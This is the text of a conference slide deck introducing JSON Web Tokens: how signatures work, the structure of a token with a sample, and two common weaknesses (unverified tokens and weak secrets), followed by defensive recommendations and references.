Slide 1

Slide 1 text

Demystifying JWT Pradheepa Pullanieswaran 18-DEC-2024

Slide 2

Slide 2 text

What is “Security”?

Slide 3

Slide 3 text

Boring !!!!

Slide 4

Slide 4 text

Scary !!!!

Slide 5

Slide 5 text

Complex !!!!

Slide 6

Slide 6 text

● Bore ● Scare ● Complicate Today’s Agenda

Slide 7

Slide 7 text

● JWT - What is it? ● Vulnerabilities Today’s Agenda

Slide 8

Slide 8 text

Me

Slide 9

Slide 9 text

Me Pradheepa Pullanieswaran Security Solution Architect Mother of Twin Daughters www.pradheepa.com

Slide 10

Slide 10 text

JWT

Slide 11

Slide 11 text

Passwords ?

Slide 12

Slide 12 text

A Digital Identity

Slide 13

Slide 13 text

1. Should not be Guessable 2. Numbers, Special Character, Length 3. Do not share 4. MFA

Slide 14

Slide 14 text

Asymmetric Algorithm

Slide 15

Slide 15 text

Public Key Private Key

Slide 16

Slide 16 text

Digitally Signed with Private Key Verified the message using the public key

Slide 17

Slide 17 text

Signed Message - How does it ensure security? Signature

Slide 18

Slide 18 text

1. Signer prepares the message Signer Verifier

Slide 19

Slide 19 text

2. Signer creates the hash of the message Signer Verifier Hashing Function #######

Slide 20

Slide 20 text

3. Signer encrypts the hash Signer Verifier Hashing Function ####### K Private Encrypt

Slide 21

Slide 21 text

4. Signer adds the signature to the message Signer Verifier Hashing Function ####### K Private Encrypt Signature

Slide 22

Slide 22 text

5. Verifier hashes the message Signer Verifier Hashing Function ####### K Private Encrypt Signature Hashing Function #######

Slide 23

Slide 23 text

6. Verifier decrypts the signature Signer Verifier Hashing Function ####### K Private Encrypt Signature Hashing Function ####### Decrypt ####### K Public

Slide 24

Slide 24 text

7. Verifier matches and verifies Signer Verifier Hashing Function ####### K Private Encrypt Signature Hashing Function ####### Decrypt ####### K Public Equals?

Slide 25

Slide 25 text

8. Signature guarantees the message Signer Verifier Signature 1. Message is not tampered 2. The signer owns the private key

Slide 26

Slide 26 text

JSON WEB TOKEN

Slide 27

Slide 27 text

JWT - When did u last use this?

Slide 28

Slide 28 text

OAuth OIDC

Slide 29

Slide 29 text

Provides access to the Application

Slide 30

Slide 30 text

JWT ● Widely adopted method for stateless authentication and secure data transmission, especially in the context of API authentication and single sign-on (SSO) systems. ● Popular with the rise of RESTful APIs and the need for decentralized authentication, particularly with frameworks like OAuth 2.0 and OpenID Connect. ● JWT's simplicity, flexibility, and ease of use have made it the de facto standard for token-based authentication in many modern web applications.

Slide 31

Slide 31 text

JWT Development Timeline ● 2010: The idea of JWT was conceived by Mike Jones. The need for a compact and secure way to transmit information between parties led to the creation of JWT as an alternative to earlier standards like SAML (Security Assertion Markup Language). ● 2011: The JWT format started to gain traction, and early discussions and drafts emerged, leading to the creation of libraries and tools that implemented it. ● 2015: JWT was officially standardized with the publication of RFC 7519 by the IETF Security Area. This RFC defines how JWTs should be structured, signed, and validated, making it a formal and interoperable standard.

Slide 32

Slide 32 text

JWT ● “JOT”/JSON WEB TOKEN ● Base64 encoded ● Signed ● Encrypted . .

Slide 33

Slide 33 text

Sample JWT eyJhbGciOiAiSFMyNTYiLCAidHlwIjogIkpXVCJ9.eyJzdWIiOiAiMTIzNDU2Nzg 5MCIsICJuYW1lIjogIkpvaG4gRG9lIiwgImlhdCI6IDE1MTYyMzkwMjJ9.eY0_1j sIu8FZp7Oo7Nq6fys13BcBQGR3hImy5Gh6uww

Slide 34

Slide 34 text

Header eyJhbGciOiAiSFMyNTYiLCAidHlwIjogIkpXVCJ9. { "alg": "HS256", "typ": "JWT" }

Slide 35

Slide 35 text

Payload eyJzdWIiOiAiMTIzNDU2Nzg5MCIsICJuYW1lIjogIkpvaG4gRG9lIiwgImlhdCI6 IDE1MTYyMzkwMjJ9. { "sub": "1234567890", "name": "John Doe", "iat": 1516239022 }

Slide 36

Slide 36 text

Footer eY0_1jsIu8FZp7Oo7Nq6fys13BcBQGR3hImy5Gh6uww Encoded and Encrypted Signature

Slide 37

Slide 37 text

JWT with HS256

Slide 38

Slide 38 text

Key Generator

Slide 39

Slide 39 text

JWT with RS256

Slide 40

Slide 40 text

JWT - Vulnerabilities

Slide 41

Slide 41 text

No content

Slide 42

Slide 42 text

1. Token without Verification

Slide 43

Slide 43 text

JWT Valid Without Footer?

Slide 44

Slide 44 text

Unfortunately Yes

Slide 45

Slide 45 text

What is the significance of Footer?

Slide 46

Slide 46 text

Remember this slide ?? Signer Verifier Hashing Function ####### K Private Encrypt Signature Hashing Function ####### Decrypt ####### K Public Equals?

Slide 47

Slide 47 text

If you are not verifying, you are trusting

Slide 48

Slide 48 text

No content

Slide 49

Slide 49 text

2. Weak Secret

Slide 50

Slide 50 text

No content

Slide 51

Slide 51 text

Prone to Brute-Force

Slide 52

Slide 52 text

Key Takeaways

Slide 53

Slide 53 text

Choose the proper signature algorithm ➔ HMACs are only useful internally in an application ➔ All other scenarios should rely on asymmetric signatures Follow JWT security recommendations ➔ Explicitly type your JWT ➔ Use strong signature algorithms ➔ Use reserved claims and their meaning Explicitly verify the security of the backend application ➔ Libraries should be actively supported and up to date ➔ JWTs with none signatures should be rejected case-insensitively ➔ JWTs with invalid signatures should be rejected

Slide 54

Slide 54 text

Any Questions

Slide 55

Slide 55 text

Thank You

Slide 56

Slide 56 text

References https://owasp.org/www-chapter-belgium/assets/2021/2021-02-18/JWT-Security.pdf https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/ https://8gwifi.org/jwsgen.jsp